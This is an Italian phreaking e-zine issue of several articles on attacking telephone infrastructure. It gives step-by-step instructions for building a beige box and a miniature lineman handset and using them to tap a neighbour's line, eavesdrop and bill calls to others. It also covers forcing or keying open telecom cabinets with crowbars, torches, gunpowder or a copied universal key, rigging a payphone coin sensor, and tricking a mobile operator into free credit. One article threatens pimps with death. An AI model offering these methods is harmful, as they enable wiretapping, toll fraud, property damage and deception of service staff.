Chi capisce qualcosa di elettronica notera' che mancano diodi e condensatatori
(forse anche il simbolo del transistor e sbagliato), ma per il momento
l'importante e' afferrare in cosa consiste l'interruttore, perché e' di vitale
importanza sapere quale dovra' essere la frequenza della corrente circolante
nella bobina I e quella indotta nella bobina II ,affinche' non ci siano
interferenze con il sistema della cabina.
Questa incognita mi porta a un bivio con un progetto temporizzato da un
economico n555 che puo' coprire una vasta gamma di frequenze e dal costo super
contenuto ma che pecca di precisione alle alte frequenze, e un'altro
temporizzato da un quarzo, preciso come un orologio svizzero alle alte
frequenze, dal costo poco piu' superiore ma che copre bande ben definite.
L'unica consolazione e' che con un po' di bravura il ricevitore puo' essere
costruito su una basetta di 2 cm2 o al massimo di 3 cm2 (molto facile da
nascondere).
Quindi i punti salienti sono i seguenti

1) Il sistema di conteggio monete e' uguale a quello sopra descritto?
2) Quali sono i fili da cortocircuitare o mettere a massa?
3) Un ipotetico telecomando su che frequenza dovrebbe lavorare per non
interferire con la cabina e oltrepassare lo "schermo" costituito
dall'involucro della cabina.
4) Come aprire la cabina senza lasciare traccia.
5) Dove nasconderlo per bene.

(per me il IV punto non e' un problema visto che potrei usare la chiave)
Elencati questi punti a voi decidere se l'idea e' valida e magari collaborare.

Ps: il telecomando sara' magari come si vede in psc2.gif

########
#Update#
########

Guardando la foto con didascalia di una cabina aperta ho notato un bottone di
test proprio alla fine del pozzetto di discriminazione delle monete...

########
#Update#
########
-3/1/2000-

Quello che prima era una mia intuizione ora e' una conferma.
Infatti un "amico" addetto ai lavori mi ha confermato la presenza di un
interruttore meccanico.
Per la precisione si tratta del piattino di una bilancia, che in base al peso
misurato chiude uno di una serie di piu' contatti.
Meditate gente, meditate!
Anche se poi non si tratta di un vero e proprio interruttore meccanico nulla
vieta che il "sensore d'incasso" funzioni proprio come un interruttore visto
che c'e' questo pulsante.
Per qualunque cosa o anche solo per incoraggiarmi scrivete a

<->diesel@freemail.it<->

Chiave Pgp

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 6.0.2

mQCNAzhINLQAAAEEAKKhEqKGxCwM8/IdpYbLQzWfPCcwo8wue7d2I/bGHswPB2cY
rwNLCsugP6dLm0ougzjzFWrmao+q6FE19UDaNuraRSA7nWKxFk3g6F8wkgVVB/So
EMguiloGdJy1EBDTCJLxB8SNPewAAGevoDKU2mJy/fgepD6JkBmRhbq5lkuVAAUR
tBlJZW56byA8aWVuem9AZnJlZW1haWwuaXQ+iQCVAwUQOEg0tBmRhbq5lkuVAQGI
IAP/cyPVV6zfCvu2aRxX/r46JX4mcqC6s5kRLcl8RHugRjUK3/zCyi5OayL59FwY
U3jYliLStQr6FGOBtST/ElHaYAEALjUuHV8zizpJc7cyDuyTYln3fbCVj2qb0oOq
GZGMm6mfZLKa0x/MjxLS01RdVNZmJ5BlRlnKl58TZ3J7l64=
=c5iq
-----END PGP PUBLIC KEY BLOCK-----

Biez!

---DieseL---

-=!!!|-lA fIamMa 0sSidRikA-|!!!=-

Autore: SiCkb0y

Everybody is in the place, let's go!

Salve a tutti, in questo articolo vorrei parlarvi di una cosa a mio parere
piuttosto importante ma spesso sottovalutata dai phreakers: la fiamma ossi-
drica. In particolare voglio analizzare due tipi, il cannello a gas butano
e il cannello ossiacetilenico. Questi apparecchi, come avrete facilmente
intuito, vengono usati per i brute forcing a centraline telefoniche e altro.

Cannello a butano

Sicuramente e' il tipo piu' diffuso, in quanto con 30k ce lo possiamo procu-
rare in una qualsiasi ferramenta; e' l' ideale per 'lavoretti' semplici e
veloci su plastica e lastre di metallo tenero e sottile. La fiamma raggiun-
ge una temperatura di circa 1000 °C. La comodita' di questo strumento sta
soprattutto nelle sue ridotte dimensioni e nel costo davvero esiguo; si può
celare comodamente sotto un ampio giaccone, accanto al piede di porco :)).
Lo svantaggio principale sta' proprio nella sua scarsa 'potenza', quindi
scordatevi di sfondare una lastra di ferro o acciao con un cannello a buta-
no. Essendo la fiamma di colore blu, e' praticamente invisibile al buio, e
aiutera' la vostra mimetizzazione; se invece avete bisogno anche di una
fonte di illuminazione bastera', prima di recarsi al lavoro, immergere la
punta del cannello in una soluzione concentrata di acqua e sale. In commer-
cio ci sono anche dei mini cannelli, da 50k che pero' servono davvero a
poco; in compenso stanno comodamente in tasca, essendo appena piu' grandi
di un accendino.

Cannello ossiacetilenico

Decisamente questo e' il mio preferito, nonostante l' abbia usato solo un
paio di volte. L' acetilene (C2H2) e' un gas piuttosto pericoloso e non va
assolutamente usato da principianti: se la bombola contenente il gas viene
riscaldata a piu' di 50-60 °C, e' reale il rischio di esplosioni causate
dalla polimerizzarione dell' acetilene, che possono avvenire anche a
distanza di 24 ore.

Un kit completo si compone di:

- 2 bombole di gas (Ossigeno: ogiva bianca - Acetilene: ogiva arancione)
- Riduttori di pressione (Ossigeno e Acetilene)
- Accessori vari (Valvole di sicurezza, tubi gomma, raccordi rapidi di con-
nessione, anelli stringitubo)
- Cannello per saldatura e taglio.

Come avrete capito il costo di tutta questa attrezzatura e' decisamente ele-
vato, per un impianto medio-piccolo si aggira sul milione. Certemente le
prestazioni sono stupende: la fiamma raggiunge e supera agevolmente i
3000°C, consentendo di trattare qualsiasi materiale. Una cosa molto 'carina'
che si puo' fare e' il taglio ossigas: questo procedimento viene applicato
a tutti i metalli di difficile lavorazione, come l' acciaio e la ghisa.
Con la fiamma ossiacetilenica si riscalda il pezzo da trattare fino a farlo
diventare di un colore rosso brillante (per ferro e acciaio), quindi con un
getto di ossigeno puro il metallo viene tagliato con facilita'. E' piutto-
sto difficile trovare in commercio kit portatili, che nel migliore dei casi
pesano alcuni chili. Per questo e' necessaria una buona organizzazione e
una certa esperienza. Un altro aspetto negativo e' che la fiamma a contatto
con il metallo produce oltre ad un forte calore, anche una notevole illumi-
nazione. L' aspetto positivo e' dato dal fatto che praticamente nula resi-
ste all' acetilene :)).

---sIcKb0y---

-=!!!|-bEiGe b0x-|!!!=-

Autore: dR`sP3nKy/gouranga

La beige box è una box ancora possibile da utilizzare e facile da fare, non
per niente è la più diffusa.

Avete presente i cavetti che usate per connettervi alle centraline ?!?
Bene.
La beige box è costituita da un cavo telefonico e un telefono.
Sintetizzo il testo sottostante, parlando del tipo più diffuso:

Prendete un cavo telefonico, scarnatelo, escono due cavi, prendete i due
centrali, scarnate anche questi e collegateci due coccodrillini medi,
all'altra estremità comparirà un pin che dovrà essere collegato al telefono.

Potete infine conettervi ad una centralina e sentire i discorsi altrui oppure
parlare con vostra zia in Zaire, divertitevi a intervenire nelle
conversazzioni fingendo interferenze, fingete di essere la polizia e farli
credere che hanno il telefono sotto controllo.

Ho allegato un testo che parla di appunto di beige box....., risale al 1993,
vediamolo.......

ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ ³
³ The Beige/Bud/Razz/etc... Box and The Brown Box ³
³ By The White Ninja with thanks to Switchblade ³
³ ³
³ "A true patriot must always be ready to defend ³
³ his people against his government!" ³
³ ³
³ Call The Ninja's Domicile at +1.615.370.8805 ³
³ ³
ÔÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ3/4

The Beige Box is a very useful device that has gone by many different names in
the past. Basically it is a line-man's handset. It allows you to, among other
things, gain access to anyone's phone line and phreak all you want!!!

The Phone Company ACTUALLY uses this technique to make calls when on the road...

Note: Some of this may not work under ISDN. There are two main ways to build
one of these and I will discuss them both. NOTE: The situations discribed in
this file are hypothetical, and the main intent of this file is to provide
information on telecommunications. This file will teach you about phone line
voltages, conferencing of conversations, and how the phone company's test
sets can and are used. I do not recommend that you try anything in this file
on anyone's line other than your own; it could shorten your life in the free
world...

1 -- The Quick Way.

Get a standard phone cord and rip one plug off. Then strip the ripped end
(Radio Shack sells a nice device for doing this.) and hook up 2 alligator
clips, one to the green wire (called the tip wire) and one to the red wire
(called the ring wire). Then plug a phone into the other end (This may require
a male to male coupler.) and your ready to go!!

2 -- The Best Way

Go to Radio Shack and pick up a bag full of Red, Green, Black, and Yellow
alligator clips (comes with 8, you only need 4), a Telephone Network Interface
Box (A little beige (haha) box with 8 screws and a telephone wire coming out
of it.), and some wire. Pop out the 4 tabs on the sides of the box and put
one end of each alligator clip through the holes (use one of each color). The
clips don't fit perfectly so you'll have to squeeze them in. Wire the red
clip to one of the screws on the red terminal, the green clip to one of the
screws on the green terminal, and so on for the other 2 colors. Plug your
phone in and thats it!

-- Note --
You can also plug a modem into these!

-=How to use=-

-- Attacking a Neighbor's Line --

Well, go out to your neighbor's house and find the little gray Bell box on the
side or back wall near the power box. This is the real network interface box,
it should have a bell logo on it. Open this up and you will see 1 of 2 things
depending on how old their house is.

1 -- Older houses

You'll see 5 screws, like this:

* *

*

* *

Plug your clips into the screws on the right (or on the left if the guy has 2
lines). If you don't get a dial tone try switching the clips.

2 -- Newer houses

You'll seen 8 screws, 4 for line one and 4 for line 2 (line 2 screws will have
no wires connected to them if the guy doesn't have a second line). You will
also see 2 phone plugs. You can plug your phone directly into a phone plug or
hook up the clips to the corresponding screws.

-- Attacking a Junction Box --

This box can also be hooked up to a telephone junction box or can (the gray
boxes that stick out of the ground and hang from telephone poles)(DON'T HOOK
YOUR CLIPS UP TO A POWER CAN!!!). Get a 7/16ths hex driver and open one of
these up. You will see a mass of cables all hooked up to some white terminals
or screw sets. Hook your clips up and experiment until you get a dial tone.

-- What to do --

Well, you can make all the LDs, 700, 900, Blue Box, and hack calls you want!!
They will all be traced/charged to the line you are hooked up to. You can
also listen in on all calls made to/from the line, or disable the line by
hooking the screw for the red clip and the screw for the green clip together.

(This is the same as putting the call on hold...) At a neighbors house you
can set up all sorts of features including remote call forwarding (Lots of
phun!!!!). Also, if you made the box the 2nd way, and the guy has 2 lines or
you are at a junction box, you can get 3-way by Brown Boxing!!

You also may want to hook this box up to your own phone line...
Take the phone plug and plug it into one of your wall jacks. By hooking the
green and red clips together, you can put the calling party on hold; rubbing
the clips together produces fake line noise or a "bad connection." Hooking up
a multi-meter or a vol meter will give you more info, use the following chart:

On hook = 50 VDC, if less than this, your line could be bugged...
Ring = Jumps between 1 and 50 VDC...
Off hook = 1-13 VDC, depends on the type and number of phones off the hook,
this is useful if you want to know if someone is eavesdropping on
our conversation...

When you pulse dial you break the connection and reconnect quickly. If you
press the hook switch the voltage will go up until you let go. If you let the
voltage reach 50 volts you will be dissconnected. You can pulse dial by hand.
All you have to do is repeatedly press the hook switch. However, it does take
some practice to be able to dial well. This method can be used to defeat dail
locks sometimes seen on phones in airports and the like...

-=The Brown Box=-

The Brown Box is a simple device that connects 2 lines to allow 3-way calling.
First I will describe how to do this at your own home and then how to do it
with the better Beige Box!!!!!! Go out and get a line splicer, the little box
you plug into you wall jack to allow 2 phones to be hooked up to one plug.

We will be using it in reverse, to allow 2 lines to be hooked up to one phone.
Plug the male end (the one that is supposed to go to your wall jack) into the
back of your phone. Then plug line 1 in and make a call. When the person
answers, plug in line 2. You will hear a dial tone and either of you can
dial!!!!! With the better Beige Box you need to wire the black terminal to
the red terminal and the yellow terminal to the green terminal, making sure
nothing shorts.

Then, hook your clips up to line one and make a call. When
the person picks up, hook your black clip to line 2 where you would normally
put your red clip, and hook up the yellow where you would normally put the
green. You'll get a dial tone. You can hook the terminals of more than one
better Beige Box together to add more people to your call, but you will have
to amplify the speech so that everyone can hear.


ANARCHY IN '93!!!!!




Ho copiato tutto il testo per rispettare l'autore, per non offenderlo.
Come avete letto la beige box è la box più facile da costruire e finchè non si
userà fibbra ottica o satellite o cose simili per communicare , si userà una
semplice linea telefonica si potrà usare.

Il file è stato creato il 7 gennaio 1993, quindi è piuttosto vecchiotto, che
dite? Vuol dire che la beige box oltre a essere la box più usata dai preakers
è anche quella che soppravive nel tempo più di altre (es. black box, blue box,
green box, jolly box....)

Ho sentito voci che dicevano che boxare con un blue box era ancora possibile,
le voci sono state confermate da un mio amico che sostiene di aver boxato,
quindi dò ragione a chi dice che boxare è ancora possibile, molto difficile
ma possibile (e non solo verso i paesi del 3° mondo).

Continuando a parlare di beige box, si può sostituire al telefono un bel pc
portatile con modem e buttare dentro alla centralina per riprendere tutto un
giorno successivo o fare cose simili.....

Io mi conetto a centraline quasi quotidianamente, mi hanno preso solo una
volta, non mi hanno fatto un cazzo, la denuncia non è mai stata compiuta
quindi chiusa, io intanto avevo scaricato 3 giorni prima windows 2000 e lo
avevo venduto.

P.S. Non vi è mai venuto in mente che da una serratura si può risalire a una
chiave, noooo?

Ho preso una serratura di una centralina e la ho portata dal fabbro-arrotino
di fiducia, in tre giorni ho avuto la mia bella chiave ed'ho aperto centraline
che prima non riuscivo ad aprire.


---gouranga---

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x

Ringrazio moltissimo il mio carissimo amico gouranga per il suo artikolo;
purtroppo non se la passa bene...Hei gouranga...io e gli altri di
#phreak.it ti aspettiamo.Ciao gour e buona guarigione.Oi!

dR`sP3nKy
-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x



-=!!!|-k0mE tI k0MbIn0 iL vIcIn0-|!!!- pArT tw0

Autore: sAnto-sAtanello

======
Disclaimer Poetico: Se telekoz vuoi hackerare questo articolo devi guardare!
Ma se dai caramba ti fai sgamare me non devi scassare!
Mi raccomando bimbo bello, usa il tuo cervello,
e se farai del danno solo cazzi tuoi saranno!

Disclaimer Normale: Fate attenzione a quel che fate, io vi do solo
informazioni, come le usate poi, beh, quelli sono solo
affaracci vostri. Quindi non venite a scassare me se
fate dei danno okay???
======

Ciao a tutti ragazzi/e, come butta la vita??? Finalmente sono riuscito a
pubblicare le foto di quella famosa centralina di cui si parla in "AIS 1"!
Allora, sar• brevissimo in questo articolo, perchŠ il tempo stringe! (non Š
vero, e che non so cosa dire!!!) Ho tentato di mettere in evidenza tutte
parti interessanti dell'aggeggio, da quelle meccaniche a quelle elettriche.
Ho messo alcune foto delle due serrature, (quella finta e quella vera (vedi
AIS1) ), ho messo una foto dei cardini per quel che pu• servire, le
contattazioni, i tuboni di fili, e lo sportello. Ho messo anche le foto di
due mini-centraline (dall'immagine 31 alla 36), che mandano il segnale
telefonico alla singola utenza, ad esempio a una piccola serie di alloggi.
Come noterete alcune foto sono state ritagliate o in alcuni punti sfocate;
l'ho fatto per mascherare eventuali particolari che potessero far riconoscere
la centralina e la sua ubicazione.

Bene bene bene, siamo giunti alla fine, se ritenete manchi qualcosa fatemelo
sapere, fatemi sapere anche se vi pare abbia detto delle minchiate assurde!
Sono a vostra disposizione.

Saluti da
---sAnto-sAtanello---


-=!!!|-iL LiNeMaN HAnDSeT ChE USan0 a lIlLiPuT-|!!!=-

Autore: VELENO


CONSUMO: Qualche milliampere (offerto gentilmente dalla Telecom)
Cinque ore del mio tempo (scusate se è poco)
Una confezione di liquirizie "Tabù" (pubblicità occulta)

SALUTI: [Prck], ]Prck[, Gouranga (guarisci presto!), Sp3nky,
Chiara (il bot più scemo del mondo), Grassopar, e tutti i ragazzi di
#phreak.it TRANNE I LAMER!!! (Ce ne sono parecchi...)


Ok raga! Inizio il mio articoletto con i ringraziamenti a tutto il team degli
AiS per aver pubblicato il mio misero pensiero, e rivolgo un saluto speciale
al caro dR'Oi alias Sp3nky per avermi dato la possibilità di collaborare con
la e-zine...

Benebenebene. Se siete arrivati fino qui nella lettura, avrete sicuramente
letto pure il titolo.

Spero *VIVAMENTE* che voi sappiate cosa sia un Lineman Handset...No?

In breve, un lineman handset è un telefono a tutti gli effetti, con la
differenza che ai suoi terminali, esso non porta una spina telefonica come il
vostro telefono di casa, bensì "qualcosa" che ne permette il collegamento con
linee telefoniche "di servizio"...(Mi sembra di sentire il vostro OOOHH! di
meraviglia).

Solitamente, quindi, al posto della spina con 3 contatti (quella del telefono
"normale") si trovano due "coccodrilli" con cui il tecnico (naturalmente SOLO
il tecnico è autorizzato ad usare questo giocattolo) della telecoma si
collega alla linea di servizio dalla centralina ed esegue controlli, chiama
in centrale, controlla il "loop", ecc.

Ora, appare chiarissimo che possedere un attrezzo del genere (e credo che
molti di voi lo abbiano già) è comodo, in quanto...beh, ci siamo capiti...

Innanzi tutto, bisogna dire una cosa: solitamente, non conviene andare in giro
con un telefono modello "SIRIO" attaccato ad un cavo con alla fine due
coccodrilli neri e rossi...
Anche un idiota si insospettirebbe a vedere un telefono "modificato" in quella
maniera, credo, e visto che in giro c'è un sacco di gente che non si fa i
cazzi suoi...meglio non rischiare.

Il primo problema quindi è quello di mimetizzare il telefono, facendolo
sembrare qualcos'altro... Il mio personale L/H (lineman handset) è racchiuso
in una robusta scatoletta di metallo, recante all'esterno la presa del
telefono, il pulsante per riagganciare e DUE jack femmine, cui collegare una
normale cuffia stereofonica dotata di microfono (il microfono che si trova in
dotazione alle cuffie normali però non è adatto). I pulsanti per comporre sono
in grigio e assolutamente anonimi.
Chiedete le fotografie a Sp3nky!!!

Il problema che si pone successivamente, è quello di rendere ancora più
piccolo il dispositivo... Lunghe notti insonni mi hanno condotto alla
creazione del Lineman Handset che usano a Lilliput!

Ok raga...Date un'occhiata alla foto che ho allegato... SPETTACOLARE!
(Scusate se mi auto-glorifico ma quando ci vuole ci vuole...)

Per farvi veramente capire le dimensioni, ho messo vicino al dispositivo un
tappo di BIC nera...Notate! E non è finita qui...le dimensioni si possono
ridurre ancora di più una volta saldato tutto per bene (magari su una
"basetta" di vetronite).

Bene...Dopo essermi guadagnato la vostra ammirazione, fornisco gli ingredienti
della ricetta... Occorrono:

-1 condensatore da 2,2 microfarad
-1 condensatore da 0.1 microfarad
-1 resistenza da 390 ohm (tolleranza 1%)
-1 resistenza da 100 ohm (tolleranza 1%)

Il costo dell'operazione è di ben 1000 £!!! Contenti?

Allora, mettiamoci all'opera; il circuito è riportato nel disegno che ho
allegato all'articolo, ed è estremamente semplice...

Se siete riusciti a realizzare il circuitino di prima ( ragazzuoli, è facile!)
... Avete davanti a voi un TELEFONO!!!

Si, davvero. Quello che avete dinanzi è un telefono molto rudimentale ma
anche MOLTO PICCOLO, che potrete utilizzare per il vostro personale
divertimento...

Allora, avete davanti il circuito che vi ho disegnato? Bene. La linea
telefonica e l'eventuale microfono vanno collegato tra A e B...Il ricevitore
invece si monta tra B e C...

Dove si possono trovare il microfono ed il ricevitore? Ma via...Non devo
certo dirvelo io, ce ne sono parecchi in giro: magari un vecchio telefono o
una cornetta "abbandonata" possono essere utili.

Se potete, montate ricevitore e microfono su una cuffia per ascoltare la
musica o ancora meglio su una cuffia per PC, dotata anche di microfono...
Non si noterà la differenza tra una cuffia normale ed una modificata.

Questo è tutto. Purtroppo, un attrezzo così piccolo ha degli inconvenienti,
logicamente, ma essi sono facilmente risolvibili...

Per comporre il numero è necessario disporre di un walkman.
Con il CoolEdit o roba simile, generate i toni relativi ai numeri che
desiderate chiamare e incideteli su una audiocassetta, avendo cura di
spaziarli di qualche secondo l'uno dall'altro...

Una volta collegato il Lineman che vi siete costruiti alla linea telefonica,
collegate ad A e B pure l'uscita del walkman regolando il volume su una
posizione intermedia. Quando avete la linea, mandate in PLAY la cassetta è il
walkman vi comporrà il numero! (La qualità della registrazione è importante
ma non fondamentale: ho provato con una audiocassetta un pò rovinata e tutto
ha funzionato alla perfezione).

A questo punto il walkman non serve più, fino a quando non dovrete comporre
un altro numero...
La comodità del telefono che vi ho mostrato, però, risiede nel fatto che anche
se staccate cuffia e microfono il telefono non riattacca, quindi voi potrete
benissimo andarvene dopo aver composto un numero (per esempio quello del
telefonino della vostra donna che CASUALMENTE ha la tariffa AUTORICARICA 250)
e lasciare che gli scatti (e l'accredito) fluiscano per un bel pò di tempo...

BUON DIVERTIMENTO E OCCHIO A NON FARE NULLA DI ILLEGALE!!!

P.S.
TUTTO ciò che è scritto in questo articolo è stato testato dal sottoscritto ed
è perfettamente funzionante; vi assicuro che il telefono microscopico
funziona *BENE* ed il collegamento con il walkman va a meraviglia...

P.P.S.
Se avete materiale *NUOVO* che non riuscite a capire o che non vi è chiaro,
se avete documenti *ORIGINALI* riguardo il sistema telefonico, se avete
FOTOGRAFIE interessanti o schemi di circuiti,se avete trovato le specifiche
del CCITT7, postatemi qualsiasi cosa su:

buzzicon3@libero.it

Oppure mandate tutto all'amico sp3nky:
sp3nky@freemail.it

Mi piacerebbe avere le vostre impressioni, i vostri pareri e le vostre
critiche...sempre che ce ne siano!!!

---VELENO---

-=!!!|-sErrAtuRe dEllE cAbInE-|!!!=-

Autore: C(h)e

Questo aritcolo si può considerare in diversi modi....può essere
un articolo base per i principianti o un articolo per quelli che
di phreack vero e proprio ne sanno sicuramente + di me (e non ci
vuole tanto). In questo articolo parlerò di come aprire le
serrature delle centraline telefoniche.... lo scrivo perkè ho
notato che nelle guide (almeno quelle in italiano) l'apertura
delle centrline viene sottovalutata e quasi sempre ricondotta ad
un semplice uso della fiamma ossidrica o della polvere da sparo.
Eppure non è piacevole lasciare in una centralina dei buchi
anke un po' bruciacchiati in prossimita delle ex-serrature,
soprattutto se si vuol fare qualkosa in segretezza.....
a me è successo e ho dovuto scovare metodi più "soft" (e anke
meno costosi, cosa che io personalmente, non disprezzo:)... ve li
descrivo...

1) Questo è il metodo descritto in tante guide di phreak... lo
inserisco solo perkè magari qualke lettore non lo conosce (?) e
quindi.... è un metodo "relaivamente" semplice.
Consiste nel fare con del cartone una scatola spartana al cui
interno verrà collocata polvere da sparo (si può prendere dai
petardi o fabbricarla... in quest'ultima ipotesi, io non ne sono
esperto e vi rimando al My Personal Cookbook di Avatar666) e
una miccia, attacrlo con dello scotch all'esterno della serratura,
avviare la miccia e scapare.... la plastica della centralina
dovrebbe sciogliersi e voi aprireste comodamente la centralina
infilando nel buko un cacciavite....
In alternativa alla polvere da sparo si può usare la fiamma
ossidrica (costa dalle 40 alle 50 carte) e fare il buko con essa...

2) Da questo punto passiamo a fare le tecniche "made in me"..:)

IMPORTANTE PREMESSA: IO QUESTA ROBA CHE STO PER SCRIVERE NON
L'HO SCOPIAZZATA DA NESSUNA PARTE, PROBABILMENTE QUALKUN'ALTRO
L'AVEVA GIA SCRITTA, MI SKUSO CON ESSI E NON MANDATEMI INUTILI
INKAZZATURE PER "COPIAZZATURA"...

Dopo questa pikkola ma doverosa premessa, posso iniziare....
la I tecnica consiste nel forcing vero e proprio, il classico:
il piede di porko.
No, non sono imbecille... almeno l'80% di voi mi sta mandando a
cagare dicendo "bella scoperta"....
Fidatevi.... allora....
Naturalmente non intendo che prendiate un piede di porko di 1 mt,
scardiniate lo sportellino e al posto di lasciare solo un bukino,
ci levate direttamente lo sportello...

OCCORRENTE:
- un cacciavite lungo, grosso e possibilmente vekkio (non quello
da 1 milione nuovo perkè va modellato allo scopo..;)
- un qualkosa con cun "appuntire" (anzi, far si che la punta diventi
a "spigolo", in pratica affilare i cacciavite in punta... capite
poi con un mio disegnino..)

Ok.. avete l'occorrente, vi spiego innanzi tutto come modellare il
cacciavite e perkè....
Il Xchè è presto spiegato... le fessure in cui un cacciavite normale
si può infilare per far leva sono poke, così aumentano tantissimo...
ecco come fare:
prendete la vostra mola (o cos'altro avete scelto) e iniziate a
"grattare" il cacciavitesulla punta dandogli un'inclinazione maggiore
da entrambi i lati... ecco i disegnini prima e dopo il lavoro:
_
/ \ /\
| | ||
| | ||
So che sembrano un'altra cosa ma... accontentatevi..:)
Bene.. ora avete il vostro bel cacciavite-porkoso e vi dirigete verso
una centralina... prima di continuare, dovete sapere come sono fatti
gli sportelli delle centraline....
solitamente nelle centraline di media grandezza sono 4 concatenati
l'uno all'altro in modo che non si possano totalmente aprire
singolarmente (tranne quello + alto)... in +, le serraure hanno
una chiusura al centro, una in alto e una in basso, tutte comandate
da quella centrale....
ok, allora: voi prendete il cacciavite e lo infilate nella fessura
in alto (che è un po+ grande di quelle di lato)... a questo punto
spostate il cacciavite in modo da farlo arrivare allaparte superiore
a destra dello sportello. In questo punto dovrebbe esserci la prima
chiusura, quindi voi iniziate a fare leva e poko dopo dovrete sentire
scrock. senza però vedere dall'esterno.... perkè?
perkè il "chiodo" che teneva insieme la chiusura e lo sportello
hanno ceduto... hehehe... e dall'esterno sembra tutto normale..;)
fate così anke per la parte centrale (che è quella + dura, avendo 3
fissaggi)e quella inferiore e lo sportello si apre mentre la serratura,
levata dai suoi appoggi vi cade in mano..
vi consiglio di tenervi la serratura che poi ci servirà per la
prossima tecnica....

3) Eccoci qui alla tecnica + raffinata.... avete mai visto lupin
con un piede di porko???
questo consiste nel farsi una bella chiave che apre tutte le
serrature delle centraline (che sono tutte uguali..:)
PREMESSA: ATTENTI ALLA BAVA CHE VI STA SCENDENDO DALLA BOKKA..HIHIHI

OCCORRENTE
- una serratura staccata dalla centralina con cui armeggiare a casa
- un seghetto per legno
- un pezzo di legno
- un calibro (o un qualkosa con cui misurare in modo preciso)
- una lima per legno
- un ferretto abbastanza spesso cilindrico (diciamo 2mm di diametro)

Spaventati dall'occorrente? eheheh....
inizio col dirvi la costruzione e il metodo di chiusura delle
serrature le serrature hanno (la parte chesi vede) una forma
ovoidale con un vistoso rigonfiamento nel mezzo allecui estremità
sono collocati 2 spunzoni che servono a blokkare.... sono sikuro
che non avete capito un kazz, quindi vi consiglio di procurarvi
la serratura, cmq in parole povere (a prescindere dalla forma)
la serratura è data da 2 piatti sovrapposti, quello inferiore
presenta 2 spunzoni con sotto una molla ciascuno... quando
gli spunzoni arriva

  
no al livello del I si può girare e perciò
aprire la serratura....
OK, il principio con cui aprirla è semplice: fare una formina di
legno con cui portere comodamente gli spunzoni a livello di I
piatto....
Prendete perciò il calibro e prendete ACCURATAMENTE tutte le misure,
disegnate la forma sul legno, la tagliate, ci applicate il ferro
dietro (inkollatelo) e provate a vedere se entra (MOLTO probabilmente
NO)... usate la lima per adattarlo.. quando sarà "giusto", pigiate
e girate... ops mi si è aperta...;)))))
Non è facile fare la formina di legno e ci perderete un po' di tempo,
ma poi avrete una bella chiave universale con cui aprire le
centraline, non so se mi spiego.....

Ultimo consiglio.... l'ora: se è in una zona poko trafficata della
città, potete anke iniziare di giorno, sikuramente, però, meglio
di notte ma... attenti!!! NON ANDATECI DI SERA TI ALLE 9-10, quando
cioè è buio ma la gente è sveglia e si affaccia alle finestre
per una bokkata d'aria..... pensate che io ho fatto questo errore
in una cabina con a mezzo metro una makkina e un uomo mi ha inseguito
perkè pensava stessi armeggiando sulla SUA makkina.....

L'articolo è finito e spero vi sia di aiuto... forse nel futuro
(magari dalla prossima uscita di AiS) faro una guida al phreack, ma
prima devo imparare io...:)
Ultimo consiglio.... l'ora: se è in una zona poko trafficata della
città, potete anke iniziare di giorno, sikuramente, però, meglio
di notte ma... attenti!!! NON ANDATECI

----C{h}e----
Disclamer: se qualkuno vi bekka o vi rompe non mi rompete il kazzo
perkè io non ho scritto questo e non so niente di hack phreack.. ok?

---C(h)e---

############################
#+-----------++-----------+#
#| cElluLaRs || cElluLaRs |#
#+-----------++-----------+#
############################

-=!!!|-fUcK dA oMnItEl?-|!!!=-

Autore: dr^sP3nKy


Ave terrestri....so' ke vi ho rotto il kaxxo kon i miei artikoli ma mi
dovrete cibare da kuesto Ais no.2 fino alla fine,non di Ais ,ma dei vostri
giorni. :)

Musika Askoltata : - T-Love (S.o.S. Ska)
- Böhse Onkelz (Oi Oi Oi)
- Exploited (Hitler`s in da Charts again)
- Oi Polloi (`nkasino de canzoni...)
- Peter And The Test Tube Babies (Vicars Wank Too)

Frase del Giorno (skontata) : << Lella ma non me kiami? >>

Artikolo Dedicato : agli Atra,elsa ,mich ,Yoghi ,tutte le ragazze ke hanno le
palle da farsi la cresta ( me lo facciano sapere se ne
esiste kualkuna sp3nky@freemail.it ), a lili ,Eva_Kant ,
lella (anke perke' me mena se non la cito) e a dAniele mio
caro amiko ke vedo poko( oi! ).

Avviso del giorno a tutti i papponi di Roma :

State per finire la vostra lurida vita UazUAzuazUAzUazUAzUAzUazUAzUuaZ ,
avete rotto il kazzo di far andare piskelle ke non voglio dare la figa sui
marcia piedi....kom'era? ...Kuando volete una partitina ai nos’koltelli......
...UazuAzuAz....state per morire tutti. Le Strade saranno pulite un giorno.

Un Grosso Fankulo a tutti i tipi ke dikono ke Anarchy In The System e' una
`Zine formata da rippatori (gente ke kopia artikoli di altri ,mettendo alla
fine il proprio nick) oi! oi! oi!

NON So` Se Kuesto Trukketto Funzioni Ankora.

Se avete una skeda rikarikabile Omnitel potete farvela rikarikare *gratis* ,
kuesto dipende da kuanto usate il vostro cell per mandare Sms.
Dovete sapere ke il cellulare della Samsung ,modello SGH600 , non supporta
bene la skeda Omnitel , kuindi ki ha la sfortuna di averlo komperato e usa
skeda Omnitel si ritrova degli addebiti Sms numerosi anke se non ha usato il
servizio Sms kosi' tanto.

Ekko kome fare :

Kiamate il 190 (cioe' il centro servizi della Omnitel),dite all'operatore e
all'operatrice kon voce un pokino inkaxxata ke kuando parlate al cell secondo
voi skalano troppi soldi anke se parlate poko.
Kiedete se vi kontrollano il credito (dato ke il credito non sta sulla skeda).
Dite ke avete il SGH600 della Samsung.L'operatore vi dira' ke se avete kuesto
cell il problema rimarra'. Rispondete ke avete venduto il cellulare e ora ne
avete un altro. L'operatore vi aumentera' il credito,dipende, kome ho detto
prima, da kuanto usate il vostro cell.
Se bekkate l'operatore stronzo tentate a kiamare piu' tardi e provate kon un
altro operatore.
Pikkalì a Tutti
Ich Mag Den Punk

oi!

---iL dR`sP3nKy---



